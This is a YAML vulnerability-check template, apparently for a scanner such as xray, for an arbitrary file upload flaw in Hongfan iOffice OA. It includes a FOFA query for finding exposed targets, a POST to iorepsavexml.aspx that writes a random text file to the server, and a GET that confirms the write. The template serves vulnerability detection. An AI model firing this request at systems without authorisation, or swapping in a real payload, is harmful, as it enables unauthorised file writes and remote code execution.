id: hongfan-oa-iorepsavexml-file-upload

info:
  name: 红帆OA iorepsavexml.aspx 任意文件上传
  author: Observer
  severity: critical
  verified: true
  description: |
    FOFA: app="红帆-ioffice"
  reference:
    - https://github.com/FridaZhbk/pocscan/blob/ee0c74e68ec95b82a4e4ebcdb961d6ed18a44b77/%E7%BA%A2%E5%B8%86/oa%E7%BA%A2%E5%B8%86ioAssistance.asmx%E6%B3%A8%E5%85%A5RCE.py#L47
  tags: hongfan,oa,rce
  created: 2023/06/25

set:
  randstr: randomLowercase(10)
  randbody: randomLowercase(32)
rules:
  r0:
    request:
      method: POST
      path: /iOffice/prg/set/report/iorepsavexml.aspx?key=writefile&filename={{randstr}}.txt&filepath=/upfiles/rep/pic/
      body: |
        {{randbody}}
    expression: response.status == 200
  r1:
    request:
      method: GET
      path: /iOffice/upfiles/rep/pic/{{randstr}}.txt
    expression: response.status == 200  && response.body.bcontains(bytes(randbody))
expression: r0() && r1()